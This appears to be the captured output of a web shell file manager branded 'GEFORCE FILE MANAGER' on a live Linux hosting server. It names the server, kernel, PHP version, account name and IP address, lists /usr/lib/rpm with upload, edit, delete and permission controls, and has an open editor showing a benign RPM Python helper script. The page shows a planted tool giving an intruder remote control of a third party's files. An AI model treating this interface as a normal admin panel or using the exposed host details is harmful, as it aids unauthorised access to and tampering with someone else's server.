[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
rpm
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 fileattrs
SET
[ DEL ]
📁 macros.d
SET
[ DEL ]
📁 platform
SET
[ DEL ]
📁 redhat
SET
[ DEL ]
📄 kabi.sh
468 B
SET
[ EDIT ]
|
[ DEL ]
📄 kmod.prov
682 B
SET
[ EDIT ]
|
[ DEL ]
📄 macros
43,988 B
SET
[ EDIT ]
|
[ DEL ]
📄 python-macro-helper
634 B
SET
[ EDIT ]
|
[ DEL ]
📄 pythondeps.sh
921 B
SET
[ EDIT ]
|
[ DEL ]
📄 pythondistdeps.py
11,184 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpm.daily
296 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpm.log
61 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpm.supp
688 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpm2cpio.sh
1,249 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_dump
16,904 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_load
29,296 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_loadcvt
1,467 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_recover
16,904 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_stat
16,872 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_upgrade
12,752 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmdb_verify
16,856 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmpopt-4.14.3
11,470 B
SET
[ EDIT ]
|
[ DEL ]
📄 rpmrc
17,154 B
SET
[ EDIT ]
|
[ DEL ]
📄 tgpg
929 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: python-macro-helper
from distutils.sysconfig import get_python_lib from platform import python_version_tuple import sys if __name__ == "__main__": if len(sys.argv) < 2: sys.stderr.write("Usage: %s <command>\n" % sys.argv[0]) sys.exit(1) if sys.argv[1] == "version": sys.stdout.write(".".join(python_version_tuple()[:2])) sys.exit(0) if sys.argv[1] == "sitelib": sys.stdout.write(get_python_lib()) sys.exit(0) if sys.argv[1] == "sitearch": sys.stdout.write(get_python_lib(1)) sys.exit(0) sys.stderr.write("Unknown command: %s\n" % sys.argv[1]) sys.exit(1)